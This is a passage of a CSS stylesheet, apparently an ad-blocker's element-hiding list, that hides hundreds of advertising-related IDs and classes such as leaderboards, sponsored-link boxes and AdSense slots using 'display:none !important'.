ponsoredresultend,#idSponsoredresultstart,#iframeRightAd,#iframeTopAd,#imu_ad_module,#in_serp_ad,#inadspace,#indexad,#inline-story-ad,#inlineAd,#inlinead,#inlinegoogleads,#inlist-ad-block,#inner-advert-row,#inner-top-ads,#innerpage-ad,#inside-page-ad,#insider_ad_wrapper,#instoryad,#instoryadtext,#instoryadwrap,#int-ad,#interstitial_ad_wrapper,#iqadtile8,#islandAd,#j_ad,#ji_medShowAdBox,#jmp-ad-buttons,#joead,#joead2,#js_adsense,#ka_adRightSkyscraperWide,#ka_samplead,#kaufDA-widget,#kdz_ad1,#kdz_ad2,#keyadvertcontainer,#landing-adserver,#lapho-top-ad-1,#largead,#lateAd,#layerAds_layerDiv,#layerTLDADSERV,#layer_ad_content,#layer_ad_main,#layerad,#leader-board-ad,#leaderAd,#leaderAdContainer,#leader_ad,#leader_board_ad,#leaderad,#leaderad_section,#leaderboard-ad,#leaderboard-bottom-ad,#leaderboardAd,#leaderboard_ad,#leaderboard_ad_gam,#left-ad-1,#left-ad-2,#left-ad-col,#left-ad-skin,#left-bottom-ad,#left-lower-adverts,#left-lower-adverts-container,#leftAdContainer,#leftAd_rdr,#leftAdvert,#leftSectionAd300-100,#left_ad,#left_adspace,#leftad,#leftads,#leftcolAd,#lg-banner-ad,#ligatus,#linkAds,#linkads,#live-ad,#localAds,#logoAd,#longAdSpace,#long_advertisement,#lowerAdvertisementImg,#lower_ad,#lowerads,#lowerthirdad,#lowertop-adverts,#lowertop-adverts-container,#lpAdPanel,#lrecad,#lsadvert-left_menu_1,#lsadvert-left_menu_2,#lsadvert-top,#mBannerAd,#main-ad,#main-ad160x600,#main-ad160x600-img,#main-ad728x90,#main-advert1,#main-advert2,#main-advert3,#main-bottom-ad,#main-tj-ad,#mainAd,#mainAdUnit,#mainAdvert,#mainAdvertismentP,#mainHeaderAdvertisment,#main_ad,#main_rec_ad,#main_top_ad_container,#marketing-promo,#mastAd,#mastAdvert,#mastad,#mastercardAd,#masthead_ad,#masthead_topad,#medRecAd,#media_ad,#mediaplayer_adburner,#mediumAdvertisement,#medrectad,#menuAds,#menubanner-ad-content,#mi_story_assets_ad,#mid-ad300x250,#mid-table-ad,#midRightTextAds,#mid_ad_div,#mid_ad_title,#mid_mpu,#midadd,#midadspace,#middle-ad,#middle_ad,#middle_body_advertising,#middlead,#middleads,#midrect_ad,#midstrip_ad,#mini-ad,#mochila-column-right-ad-300x250,#mochila-column-right-ad-300x250-1,#module-google_ads,#module_ad,#module_box_ad,#module_sky_scraper,#monsterAd,#moogleAd,#moreads,#most_popular_ad,#motionAd,#mpu-advert,#mpu-cont,#mpu300250,#mpuAd,#mpuDiv,#mpuSlot,#mpuWrapper,#mpuWrapperAd,#mpu_banner,#mpu_firstpost,#mpu_holder,#mpu_text_ad,#mpuad,#mpubox,#mr_banner_topad,#mrecAdContainer,#msAds,#ms_ad,#msad,#multiLinkAdContainer,#multi_ad,#my-ads,#myads_HeaderButton,#n_sponsor_ads,#namecom_ad_hosting_main,#narrow-ad,#narrow_ad_unit,#natadad300x250,#national_microlink_ads,#nationalad,#navi_banner_ad_780,#nba160PromoAd,#nba300Ad,#nbaGI300ad,#nbaHouseAnd600Ad,#nbaLeft600Ad,#nbaMidAds,#nbaVid300Ad,#nbcAd300x250,#new_topad,#newads,#news_advertorial_content,#news_advertorial_top,#ng_rtcol_ad,#noresults_ad_container,#noresultsads,#northad,#northbanner-advert,#northbanner-advert-container,#ns_ad1,#ns_ad2,#ns_ad3,#oanda_ads,#onespot-ads,#online_ad,#ovadsense,#p-googleadsense,#page-header-ad,#page-top-ad,#pageAds,#pageAdsDiv,#pageBannerAd,#page_ad,#page_content_top_ad,#pagelet_adbox,#pagelet_netego_ads,#pagelet_search_ads2,#panelAd,#pb_report_ad,#pcworldAdBottom,#pcworldAdTop,#pinball_ad,#player-below-advert,#player_ad,#player_ads,#pmad-in1,#pod-ad-video-page,#populate_ad_bottom,#populate_ad_left,#popup_domination_lightbox_wrapper,#portlet-advertisement-left,#portlet-advertisement-right,#post-promo-ad,#post5_adbox,#post_ad,#premium_ad,#priceGrabberAd,#prime-ad-space,#print-header-ad,#print_ads,#printads,#product-adsense,#promo-ad,#promoAds,#ps-vertical-ads,#pub468x60,#publicidad,#pushdown_ad,#qm-ad-big-box,#qm-ad-sky,#qm-dvdad,#quigo_ad,#r1SoftAd,#rail_ad1,#rail_ad2,#realEstateAds,#rectAd,#rect_ad,#rectangle-ad,#rectangleAd,#rectangle_ad,#refine-300-ad,#region-node-advert,#region-top-ad,#relocation_ad_container,#rh-ad-container,#rh_tower_ad,#rhapsodyAd,#rhs_ads,#rhsadvert,#right-ad,#right-ad-col,#right-ad-skin,#right-ad-title,#right-ad1,#right-ads-3,#right-advert,#right-bar-ad,#right-box-ad,#right-featured-ad,#right-mpu-1-ad-container,#right-uppder-adverts,#right-uppder-adverts-container,#rightAd,#rightAd300x250,#rightAd300x250Lower,#rightAdBar,#rightAdColumn,#rightAd_rdr,#rightAdsDiv,#rightColAd,#rightColumnMpuAd,#rightColumnSkyAd,#right_ad,#right_ad_wrapper,#right_ads,#right_advert,#right_advertisement,#right_advertising,#right_column_ad_container,#right_column_ads,#right_column_adverts,#right_column_internal_ad_container,#right_column_top_ad_unit,#rightad,#rightadContainer,#rightads,#rightadvertbar-doubleclickads,#rightbar-ad,#rightcolhouseads,#rightcolumn_300x250ad,#rightgoogleads,#rightinfoad,#rightside-ads,#rightside_ad,#righttop-adverts,#righttop-adverts-container,#rm_ad_text { display:none !important; } #ros_ad,#rotatingads,#row2AdContainer,#rprightHeaderAd,#rr_MSads,#rt-ad,#rt-ad-top,#rt-ad468,#rtMod_ad,#rtmod_ad,#sAdsBox,#sb-ad-sq,#sb_ad_links,#sb_advert,#search-google-ads,#search-sponsored-links,#search-sponsored-links-top,#searchAdSenseBox,#searchAdSenseBoxAd,#searchAdSkyscraperBox,#search_ads,#search_result_ad,#sec_adspace,#second-adlayer,#secondBoxAdContainer,#secondrowads,#sect-ad-300x100,#sect-ad-300x250-2,#section-ad-1-728,#section-ad-300-250,#section-ad-4-160,#section-blog-ad,#section-container-ddc_ads,#section_advertisements,#section_advertorial_feature,#servfail-ads,#sew-ad1,#shoppingads,#shortads,#show-ad,#showAd,#showad,#side-ad,#side-ad-container,#side-ads,#sideAd,#sideAd1,#sideAd2,#sideAdSub,#sideAds,#sideBarAd,#side_ad,#side_ad_wrapper,#side_ads_by_google,#side_sky_ad,#sidead,#sideads,#sideadtop-to,#sidebar-125x125-ads,#sidebar-125x125-ads-below-index,#sidebar-ad,#sidebar-ad-boxes,#sidebar-ad-space,#sidebar-ad-wrap,#sidebar-ad3,#sidebar-ads,#sidebar-adv,#sidebar-sponsor-link,#sidebar2ads,#sidebar_ad,#sidebar_ad_widget,#sidebar_ads,#sidebar_ads_180,#sidebar_sponsoredresult_body,#sidebar_txt_ad_links,#sidebarad,#sidebaradpane,#sidebarads,#sidebaradver_advertistxt,#sideline-ad,#single-mpu,#singlead,#site-ad-container,#site-leaderboard-ads,#site_top_ad,#sitead,#sky-ad,#skyAd,#skyAdContainer,#skyScrapperAd,#skyWrapperAds,#sky_ad,#sky_advert,#skyads,#skyadwrap,#skyline_ad,#skyscrapeAd,#skyscraper-ad,#skyscraperAd,#skyscraperAdContainer,#skyscraper_ad,#skyscraper_advert,#skyscraperad,#slide_ad,#sliderAdHolder,#slideshow_ad_300x250,#sm-banner-ad,#small_ad,#small_ad_banners_vertical,#small_ads,#smallerAd,#some-ads,#some-more-ads,#specialAd_one,#specialAd_two,#specialadvertisingreport_container,#specials_ads,#speeds_ads,#speeds_ads_fstitem,#speedtest_mrec_ad,#sphereAd,#spnAds,#sponlink,#sponlinks,#sponsAds,#sponsLinks,#sponseredlinks,#sponsorAd1,#sponsorAd2,#sponsorAdDiv,#sponsorLinks,#sponsorTextLink,#sponsor_banderole,#sponsor_deals,#sponsored,#sponsored-ads,#sponsored-features,#sponsored-links,#sponsored-listings,#sponsored-resources,#sponsored1,#sponsoredBox1,#sponsoredBox2,#sponsoredLinks,#sponsoredLinks_Top,#sponsoredList,#sponsoredResults,#sponsoredResultsWide,#sponsoredSiteMainline,#sponsoredSiteSidebar,#sponsored_ads_v4,#sponsored_container,#sponsored_content,#sponsored_game_row_listing,#sponsored_head,#sponsored_link,#sponsored_link_bottom,#sponsored_links,#sponsored_v12,#sponsoredads,#sponsoredlinks,#sponsoredlinks_cntr,#sponsoredlinkslabel,#sponsoredresults_top,#sponsoredwellcontainerbottom,#sponsoredwellcontainertop,#sponsorlink,#spotlightAds,#spotlightad,#sqAd,#squareAd,#squareAdSpace,#squareAds,#square_ad,#srp_adsense-top,#start_middle_container_advertisment,#sticky-ad,#stickyBottomAd,#story-90-728-area,#story-ad-a,#story-ad-b,#story-leaderboard-ad,#story-sponsoredlinks,#storyAd,#storyAdWrap,#storyad2,#submenu-ads,#subpage-ad-right,#subpage-ad-top,#swads,#synch-ad,#systemad_background,#tabAdvertising,#takeoverad,#tblAd,#tbl_googlead,#tcwAd,#td-GblHdrAds,#template_ad_leaderboard,#tertiary_advertising,#test_adunit_160_article,#text-ad,#text-ads,#text-link-ads,#textAd,#textAds,#text_ad,#text_ads,#text_advert,#textad,#textad3,#textad_block,#the-last-ad-standing,#thefooterad,#themis-ads,#tile-ad,#tmglBannerAd,#tmp2_promo_ad,#toolbarSlideUpAd,#top-ad,#top-ad-container,#top-ad-menu,#top-ads,#top-ads-tabs,#top-advertisement,#top-banner-ad,#top-search-ad-wrapper,#topAd,#topAd728x90,#topAdBanner,#topAdBox,#topAdContainer,#topAdSenseDiv,#topAdcontainer,#topAds,#topAdsContainer,#topAdvBox,#topAdvert,#topAdvert-09,#topBannerAd,#topBannerAdContainer,#topContentAdTeaser,#topNavLeaderboardAdHolder,#topOverallAdArea,#topRightBlockAdSense,#topSponsoredLinks,#top_ad,#top_ad-sense,#top_ad_area,#top_ad_banner,#top_ad_game,#top_ad_unit,#top_ad_wrapper,#top_ad_zone,#top_ads,#top_ads_wrap,#top_advertise,#top_advertising,#top_rectangle_ad,#top_right_ad,#top_wide_ad,#topad,#topad1,#topad2,#topad_left,#topad_right,#topadbar,#topadblock,#topaddwide,#topads,#topadsense,#topadspace,#topadwrap,#topadzone,#topbanner_ad,#topbannerad,#topbar-ad,#topcustomad,#topleaderboardad,#topnav-ad-shell,#topnavad,#toprightAdvert,#toprightad,#topsponsored,#toptextad,#tour300Ad,#tour728Ad,#tourSponsoredLinksContainer,#towerad,#ts-ad_module,#ttp_ad_slot1,#ttp_ad_slot2,#twogamesAd,#txfPageMediaAdvertVideo,#txt_link_ads,#txtads,#undergameAd,#upper-ads,#upperAdvertisementImg,#upperMpu,#upper_small_ad,#upperad,#urban_contentad_1,#urban_contentad_2,#urban_contentad_article,#v_ad,#vap_adsense-top,#vert-ads,#vert_ad,#vert_ad_placeholder,#vertical_ad,#vertical_ads,#videoAd,#videoAdvert,#video_ads_overdiv,#video_advert2,#video_advert3,#video_cnv_ad,#video_overlay_ad,#videoadlogo,#view_ads,#view_ads_advertisements,#viewads,#viewportAds,#viewvid_ad300x250,#wXcds12-ad,#wall_advert,#wallpaper-ad-link,#wallpaperAd_left,#wallpaperAd_right,#walltopad,#weblink_ads_container,#welcomeAdsContainer,#welcome_ad_mrec,#welcome_advertisement,#wf_ContentAd,#wf_FrontSingleAd,#wf_SingleAd,#wf_bottomContentAd,#wgtAd,#whatsnews_top_ad,#whitepaper-ad,#whoisRightAdContainer,#wide_ad_unit_top,#wideskyscraper_160x600_left,#wideskyscraper_160x600_right,#widget_Adverts,#widget_advertisement,#widgetwidget_adserve2,#wrapAdRight,#wrapAdTop,#wrapperAdsTopLeft,#wrapperAdsTopRight,#xColAds,#y-ad-units,#y708-ad-expedia,#y708-ad-lrec,#y708-ad-partners,#y708-ad-ysm,#y708-advertorial-marketplace,#yahoo-ads,#yahoo-sponsors,#yahooSponsored,#yahoo_ads,#yahoo_ads_2010,#yahoo_text_ad,#yahooad-tbl,#yan-sponsored,#yatadsky,#ybf-ads,#yfi_fp_ad_mort,#yfi_fp_ad_nns,#yfi_pf_ad_mort,#ygrp-sponsored-links,#ymap_adbanner,#yn-gmy-ad-lrec,#yreSponsoredLinks,#ysm_ad_iframe,#zoneAdserverMrec,#zoneAdserverSuper,.ADBAR,.ADPod,.AD_ALBUM_ITEMLIST,.AD_MOVIE_ITEM,.AD_MOVIE_ITEMLIST,.AD_MOVIE_ITEMROW,.ADbox,.Ad-300x100,.Ad-Container-976x166,.Ad-Header,.Ad-MPU,.Ad-Wrapper-300x100,.Ad120x600,.Ad160x600,.Ad160x600left,.Ad160x600right,.Ad247x90,.Ad300x,.Ad300x250,.Ad300x250L,.Ad728x90,.AdBorder,.AdBox,.AdBox7,.AdContainerBox308,.AdContainerModule,.AdHeader,.AdHere,.AdInfo,.AdInline,.AdMedium,.AdPlaceHolder,.AdProS728x90Container,.AdProduct,.AdRingtone,.AdSense,.AdSenseLeft,.AdSlot,.AdSpace,.AdTextSmallFont,.AdTitle,.AdUnit,.AdUnit300,.Ad_C,.Ad_D_Wrapper,.Ad_E_Wrapper,.Ad_Right,.AdsBottom,.AdsBoxBottom,.AdsBoxSection,.AdsBoxTop,.AdsLinks1,.AdsLinks2,.AdsRec,.AdvBoxSidebar,.Advert,.Advert300x250,.AdvertMidPage,.AdvertiseWithUs,.Advertisement,.AdvertisementTextTag,.Advman_Widget,.ArticleAd,.ArticleInlineAd,.BCA_Advertisement,.Banner300x250,.BannerAd,.BigBoxAd,.BlockAd,.BlueTxtAdvert,.BottomAdContainer,.BottomAffiliate,.BoxAd,.CG_adkit_leaderboard,.CG_details_ad_dropzone,.CWReviewsProdInfoAd,.ComAread,.CommentAd,.ContentAd,.ContentAds,.DAWRadvertisement,.DeptAd,.DisplayAd,.FT_Ad,.FeaturedAdIndexAd,.FlatAds,.FooterAds,.GOOGLE_AD,.GoogleAd,.GoogleAdSenseBottomModule,.GoogleAdSenseRightModule,.HPG_Ad_B,.HPNewAdsBannerDiv,.HPRoundedAd,.HeaderAds,.HomeContentAd,.IABAdSpace,.InArticleAd,.IndexRightAd,.LazyLoadAd,.LeftAd,.LeftButtonAdSlot,.LeftTowerAd,.M2Advertisement,.MD_adZone,.MOS-ad-hack,.MPUHolder,.MPUTitleWrapperClass,.MREC_ads,.MiddleAd,.MiddleAdContainer,.MiddleAdvert,.NewsAds,.OpaqueAdBanner,.OpenXad,.PU_DoubleClickAdsContent,.Post5ad,.Post8ad,.Post9ad,.RBboxAd,.RW_ad300,.RectangleAd,.RelatedAds,.Right300x250AD,.RightAd1,.RightAdvertiseArea,.RightAdvertisement,.RightGoogleAFC,.RightRailAd,.RightRailTop300x250Ad,.RightSponsoredAdTitle,.RightTowerAd,.STR_AdBlock,.SectionSponsor,.SideAdCol,.SidebarAd,.SidebarAdvert,.SitesGoogleAdsModule,.SkyAdContainer,.SponsoredAdTitle,.SponsoredContent,.SponsoredLinkItemTD,.SponsoredLinks,.SponsoredLinksGrayBox,.SponsoredLinksModule,.SponsoredLinksPadding,.SponsoredLinksPanel,.Sponsored_link,.SquareAd,.StandardAdLeft,.StandardAdRight,.TRU-onsite-ads-leaderboard,.TextAd,.TheEagleGoogleAdSense300x250,.TopAd,.TopAdContainer,.TopAdL,.TopAdR,.TopBannerAd,.UIWashFrame_SidebarAds,.UnderAd,.VerticalAd,.Video-Ad,.VideoAd,.WidgetAdvertiser,.a160x600,.a728x90,.ad-120x60,.ad-120x600,.ad-160,.ad-160x600,.ad-160x600x1,.ad-160x600x2,.ad-160x600x3,.ad-250,.ad-300,.ad-300-block,.ad-300-blog,.ad-300x100,.ad-300x250,.ad-300x250-first,.ad-300x250-right0,.ad-300x600,.ad-350,.ad-355x75,.ad-600,.ad-635x40,.ad-728,.ad-728x90,.ad-728x90-1,.ad-728x90-top0,.ad-728x90_forum,.ad-90x600,.ad-above-header,.ad-adlink-bottom,.ad-adlink-side,.ad-area,.ad-background,.ad-banner,.ad-banner-smaller,.ad-bigsize,.ad-block,.ad-block-square,.ad-blog2biz,.ad-body,.ad-bottom,.ad-box,.ad-break,.ad-btn,.ad-btn-heading,.ad-button,.ad-cell,.ad-column,.ad-container,.ad-container-300x250,.ad-container-728x90,.ad-container-994x282,.ad-context,.ad-disclaimer,.ad-display,.ad-div,.ad-enabled,.ad-feedback,.ad-filler,.ad-flex,.ad-footer,.ad-footer-leaderboard,.ad-forum,.ad-google,.ad-graphic-large,.ad-gray,.ad-grey,.ad-hdr,.ad-head,.ad-header,.ad-heading,.ad-holder,.ad-homeleaderboard,.ad-img,.ad-in-post,.ad-index-main,.ad-inline,.ad-island,.ad-item,.ad-label,.ad-leaderboard,.ad-left,.ad-link,.ad-links,.ad-lrec,.ad-medium,.ad-medium-two,.ad-mpl,.ad-mpu,.ad-msn,.ad-note,.ad-notice,.ad-other,.ad-permalink,.ad-place-active,.ad-placeholder,.ad-postText,.ad-poster,.ad-priority,.ad-rect,.ad-rectangle,.ad-rectangle-text,.ad-related,.ad-rh,.ad-ri,.ad-right,.ad-right-header,.ad-right-txt,.ad-row,.ad-section,.ad-show-label,.ad-side,.ad-sidebar,.ad-sidebar-outer,.ad-sidebar300,.ad-sky,.ad-skyscr,.ad-skyscraper,.ad-slot,.ad-slot-234-60,.ad-slot-300-250,.ad-slot-728-90,.ad-source,.ad-space,.ad-space-mpu-box,.ad-space-topbanner,.ad-spot,.ad-square,.ad-square300,.ad-squares,.ad-statement,.ad-story-inject,.ad-tabs,.ad-text,.ad-text-links,.ad-tile,.ad-title,.ad-top,.ad-top-left,.ad-unit,.ad-unit-300,.ad-unit-300-wrapper,.ad-unit-anchor,.ad-unit-top,.ad-vert,.ad-vertical-container,.ad-vtu,.ad-widget-list,.ad-with-us,.ad-wrap,.ad-wrapper,.ad-zone,.ad-zone-s-q-l,.ad.super,.ad08sky,.ad100,.ad120,.ad120x240backgroundGray,.ad120x600,.ad125,.ad140,.ad160,.ad160600,.ad160x600,.ad160x600GrayBorder,.ad200x60,.ad230,.ad250,.ad250c,.ad300,.ad300250,.ad300_250,.ad300x100,.ad300x250,.ad300x250-hp-features,.ad300x250Module,.ad300x250Top,.ad300x250_container,.ad300x250box,.ad300x50-right,.ad300x600,.ad310,.ad315,.ad336x280,.ad343x290,.ad400right,.ad450,.ad468,.ad468_60,.ad468x60,.ad540x90,.ad600,.ad620x70,.ad626X35,.ad644,.ad728,.ad728_90,.ad728x90,.ad728x90_container,.ad90x780,.adAgate,.adArea674x60,.adBanner,.adBanner300x250,.adBanner728x90,.adBannerTyp1,.adBannerTypSortableList,.adBannerTypW300,.adBar,.adBgBottom,.adBgMId,.adBgTop,.adBlock,.adBottomLink,.adBottomboxright,.adBox,.adBox1,.adBox230X96,.adBox728X90,.adBoxBody,.adBoxBorder,.adBoxContainer,.adBoxContent,.adBoxInBignews,.adBoxSidebar,.adBoxSingle,.adBwrap,.adCMRight,.adCell,.adColumn,.adCont,.adContTop,.adContainer,.adContentAd,.adContour,.adCreative,.adCube,.adDiv,.adElement,.adFender3,.adFrame,.adFtr,.adFullWidthMiddle,.adGoogle,.adHeader,.adHeadline,.adHolder,.adHome300x250,.adHorisontal,.adInNews,.adIsland,.adLabel,.adLeader,.adLeaderForum,.adLeaderboard,.adLeft,.adLoaded,.adLocal,.adMPU,.adMarker,.adMastheadLeft,.adMastheadRight,.adMegaBoard,.adMinisLR,.adMkt2Colw,.adModule,.adModuleAd,.adMpu,.adNewsChannel,.adNoOutline,.adNotice,.adNoticeOut,.adObj,.adPageBorderL,.adPageBorderR,.adPanel,.adPod,.adRect,.adResult,.adRight,.adSKY,.adSelfServiceAdvertiseLink,.adServer,.adSky,.adSky600,.adSkyscaper,.adSkyscraperHolder,.adSlot,.adSpBelow,.adSpace,.adSpacer,.adSplash,.adSponsor,.adSpot,.adSpot-brought,.adSpot-searchAd,.adSpot-textBox,.adSpot-twin,.adSpotIsland,.adSquare,.adSubColPod,.adSummary,.adSuperboard,.adSupertower,.adTD,.adTab,.adTag,.adText,.adTileWrap,.adTiler,.adTitle,.adTopLink,.adTopboxright,.adTout,.adTxt,.adUnit,.adUnitHorz,.adUnitVert,.adUnitVert_noImage,.adWebBoard,.adWidget,.adWithTab,.adWord,.adWrap,.adWrapper,.ad_0,.ad_1,.ad_120x90,.ad_125,.ad_130x90,.ad_160,.ad_160x600,.ad_2,.ad_200,.ad_200x200,.ad_250x250,.ad_250x250_w,.ad_3,.ad_300,.ad_300_250,.ad_300x250,.ad_300x250_box_right,.ad_336,.ad_336x280,.ad_350x100,.ad_350x250,.ad_400x200,.ad_468,.ad_468x60,.ad_600,.ad_680x15,.ad_728,.ad_728_90b,.ad_728x90,.ad_925x90,.ad_Left,.ad_Right,.ad_ad_300,.ad_amazon,.ad_banner,.ad_banner_border,.ad_bar,.ad_bg,.ad_bigbox,.ad_biz,.ad_block,.ad_block_338,.ad_body,.ad_border,.ad_botbanner,.ad_bottom,.ad_bottom_leaderboard,.ad_bottom_left,.ad_box,.ad_box2,.ad_box_ad,.ad_box_div,.ad_callout,.ad_caption,.ad_column,.ad_column_box,.ad_column_hl,.ad_contain,.ad_container,.ad_content,.ad_content_wide,.ad_contents,.ad_descriptor,.ad_disclaimer,.ad_eyebrow,.ad_footer,.ad_frame,.ad_framed,.ad_front_promo,.ad_gutter_top,.ad_head,.ad_header,.ad_heading,.ad_headline,.ad_holder,.ad_hpm,.ad_image,.ad_info_block,.ad_inline,.ad_island,.ad_jnaught,.ad_label,.ad_launchpad,.ad_leader,.ad_leaderboard,.ad_left,.ad_line,.ad_link,.ad_links,.ad_linkunit,.ad_loc,.ad_lrec,.ad_main,.ad_medrec,.ad_medrect,.ad_middle,.ad_mod,.ad_mp,.ad_mpu,.ad_mr,.ad_mrec,.ad_mrec_title_article,.ad_mrect,.ad_news,.ad_note,.ad_notice,.ad_one,.ad_p360,.ad_partner,.ad_partners,.ad_plus,.ad_post,.ad_power,.ad_primary,.ad_promo,.ad_rec,.ad_rectangle,.ad_right,.ad_right_col,.ad_row,.ad_row_bottom_item,.ad_side,.ad_sidebar,.ad_skyscraper,.ad_slug,.ad_slug_table,.ad_space,.ad_space_300_250,.ad_spacer,.ad_sponsor { display:none !important; } .ad_sponsoredsection,.ad_spot_b,.ad_spot_c,.ad_square_r,.ad_square_top,.ad_sub,.ad_tag_middle,.ad_text,.ad_text_w,.ad_title,.ad_top,.ad_top_leaderboard,.ad_top_left,.ad_topright,.ad_tower,.ad_unit,.ad_unit_rail,.ad_url,.ad_warning,.ad_wid300,.ad_wide,.ad_wrap,.ad_wrapper,.ad_wrapper_fixed,.ad_wrapper_top,.ad_wrp,.ad_zone,.adarea,.adarea-long,.adbanner,.adbannerbox,.adbannerright,.adbar,.adboard,.adborder,.adbot,.adbottom,.adbottomright,.adbox-outer,.adbox-wrapper,.adbox_300x600,.adbox_366x280,.adbox_468X60,.adbox_bottom,.adbox_br,.adbox_left,.adboxclass,.adboxesrow,.adbreak,.adbug,.adbutton,.adbuttons,.adcode,.adcol1,.adcol2,.adcolumn,.adcolumn_wrapper,.adcont,.adcopy,.add_300x250,.addiv,.adenquire,.adfieldbg,.adfoot,.adfootbox,.adframe,.adhead,.adhead_h,.adhead_h_wide,.adheader,.adheader100,.adheader416,.adhi,.adhint,.adholder,.adhoriz,.adiframe,.adinfo,.adinside,.adintro,.adits,.adjlink,.adkicker,.adkit,.adkit-advert,.adkit-lb-footer,.adlabel-horz,.adlabel-vert,.adlabelleft,.adlayer,.adleader,.adleaderboard,.adleft1,.adline,.adlink,.adlinks,.adlist,.adlnklst,.admarker,.admediumred,.admedrec,.admessage,.admodule,.admpu,.admpu-small,.adnation-banner,.adnotice,.adops,.adp-AdPrefix,.adpadding,.adpane,.adpic,.adprice,.adproxy,.adrec,.adright,.adroot,.adrotate_widget,.adrow,.adrow-post,.adrow1box1,.adrow1box3,.adrow1box4,.adrule,.ads-125,.ads-300,.ads-300x250,.ads-728x90-wrap,.ads-ads-top,.ads-banner,.ads-below-content,.ads-categories-bsa,.ads-custom,.ads-favicon,.ads-item,.ads-links-general,.ads-mpu,.ads-outer,.ads-profile,.ads-right,.ads-section,.ads-sidebar,.ads-sky,.ads-small,.ads-sponsors,.ads-stripe,.ads-text,.ads-top,.ads-wide,.ads-widget,.ads-widget-partner-gallery,.ads03,.ads160,.ads1_250,.ads24Block,.ads300,.ads460,.ads460_home,.ads468,.ads728,.ads728x90,.adsArea,.adsBelowHeadingNormal,.adsBlock,.adsBottom,.adsBox,.adsCell,.adsCont,.adsDiv,.adsFull,.adsImages,.adsInsideResults_v3,.adsMPU,.adsMiddle,.adsRight,.adsRow,.adsTextHouse,.adsTop,.adsTower2,.adsTowerWrap,.adsWithUs,.ads_125_square,.ads_180,.ads_300,.ads_300x100,.ads_300x250,.ads_320,.ads_337x280,.ads_728x90,.ads_big,.ads_big-half,.ads_box,.ads_box_headline,.ads_brace,.ads_catDiv,.ads_container,.ads_disc_anchor,.ads_disc_leader,.ads_disc_lwr_square,.ads_disc_skyscraper,.ads_disc_square,.ads_div,.ads_footer,.ads_header,.ads_holder,.ads_horizontal,.ads_leaderboard,.ads_lr_wrapper,.ads_medrect,.ads_mpu,.ads_outer,.ads_post_end,.ads_post_end_code,.ads_post_start,.ads_post_start_code,.ads_rectangle,.ads_remove,.ads_right,.ads_rightbar_top,.ads_sc_bl_i,.ads_sc_tb,.ads_sc_tl_i,.ads_show_if,.ads_side,.ads_sidebar,.ads_singlepost,.ads_spacer,.ads_takeover,.ads_title,.ads_top,.ads_top_promo,.ads_tr,.ads_verticalSpace,.ads_vtlLink,.ads_widesky,.ads_wrapperads_top,.adsafp,.adsbg300,.adsblockvert,.adsborder,.adsbottom,.adsbox,.adsboxitem,.adsbttmpg,.adsbyyahoo,.adscaleAdvert,.adscaleP6_canvas,.adsclick,.adscontainer,.adscreen,.adsd_shift100,.adsection_a2,.adsection_c2,.adsense-468,.adsense-ad,.adsense-category,.adsense-category-bottom,.adsense-googleAds,.adsense-heading,.adsense-overlay,.adsense-post,.adsense-right,.adsense-title,.adsense3,.adsense300,.adsenseAds,.adsenseBlock,.adsenseContainer,.adsenseGreenBox,.adsenseInPost,.adsenseList,.adsense_bdc_v2,.adsense_mpu,.adsensebig,.adsenseblock,.adsenseblock_bottom,.adsenseblock_top,.adsenselr,.adsensem_widget,.adsensesq,.adsenvelope,.adserver_zone,.adset,.adsforums,.adsghori,.adsgvert,.adshome,.adside,.adsidebox,.adsider,.adsingle,.adsleft,.adsleftblock,.adslink,.adslogan,.adslotleft,.adslotright,.adsmalltext,.adsmessage,.adsnippet_widget,.adspace,.adspace-MR,.adspace-widget,.adspace180,.adspace_bottom,.adspace_buysell,.adspace_rotate,.adspace_skyscraper,.adspacer,.adspot,.adspot728x90,.adstext,.adstextpad,.adstitle,.adstop,.adstory,.adstrip,.adtab,.adtable,.adtag,.adtech,.adtext,.adtext_gray,.adtext_horizontal,.adtext_onwhite,.adtext_vertical,.adtile,.adtips,.adtips1,.adtitle,.adtop,.adtravel,.adtxt,.adtxtlinks,.adunit,.adv-mpu,.adv-p,.adv-sidebar,.adv300,.advBox,.advSquare,.advVideobox,.adv_120x600,.adv_300x250,.adv_728x90,.adv_banner_hor,.adv_medium_rectangle,.adver,.adverTag,.adverTxt,.adver_cont_below,.advert-300-side,.advert-300x100-side,.advert-728x90,.advert-article-bottom,.advert-bannerad,.advert-bg-250,.advert-bloggrey,.advert-box,.advert-btm,.advert-head,.advert-horizontal,.advert-iab-300-250,.advert-iab-468-60,.advert-mpu,.advert-skyscraper,.advert-text,.advert-title,.advert-txt,.advert120,.advert300,.advert300x250,.advert300x300,.advert300x440,.advert350ih,.advert4,.advert5,.advert728x90,.advert8,.advertColumn,.advertCont,.advertContainer,.advertContent,.advertHeadline,.advertIslandWrapper,.advertRight,.advertSuperBanner,.advertText,.advertTitleSky,.advert_336,.advert_468x60,.advert_box,.advert_cont,.advert_container,.advert_djad,.advert_google_content,.advert_google_title,.advert_home_300,.advert_label,.advert_leaderboard,.advert_list,.advert_note,.advert_surr,.advert_top,.advertheader-red,.advertise,.advertise-here,.advertise-homestrip,.advertise-horz,.advertise-inquiry,.advertise-leaderboard,.advertise-list,.advertise-top,.advertise-vert,.advertiseContainer,.advertiseText,.advertise_ads,.advertise_here,.advertise_link,.advertise_link_sidebar,.advertisement,.advertisement-728x90,.advertisement-block,.advertisement-sidebar,.advertisement-space,.advertisement-sponsor,.advertisement-swimlane,.advertisement-text,.advertisement-top,.advertisement300x250,.advertisement468,.advertisementBox,.advertisementColumnGroup,.advertisementContainer,.advertisementHeader,.advertisementLabel,.advertisementPanel,.advertisementText,.advertisement_300x250,.advertisement_btm,.advertisement_caption,.advertisement_g,.advertisement_header,.advertisement_horizontal,.advertisement_top,.advertisementsOutterDiv,.advertiser,.advertiser-links,.advertisespace_div,.advertising-banner,.advertising-header,.advertising-leaderboard,.advertising-local-links,.advertising2,.advertisingTable,.advertising_block,.advertising_images,.advertisment,.advertisment_bar,.advertisment_caption,.advertisment_two,.advertize,.advertize_here,.advertorial,.advertorial-2,.advertorial-promo-box,.advertorial_red,.advertorialtitle,.adverts,.adverts-125,.adverts_RHS,.advt,.advt-banner-3,.advt-block,.advt-sec,.advt300,.advt720,.advtitle,.adwhitespace,.adwordListings,.adwords,.adwordsHeader,.adwrap,.adwrapper-lrec,.adwrapper948,.adzone-footer,.adzone-sidebar,.affiliate-link,.affiliate-sidebar,.affiliateAdvertText,.affiliates-sidebar,.affinityAdHeader,.afsAdvertising,.after_ad,.agi-adsaleslinks,.alb-content-ad,.alignads,.alt_ad,.anchorAd,.another_text_ad,.answer_ad_conte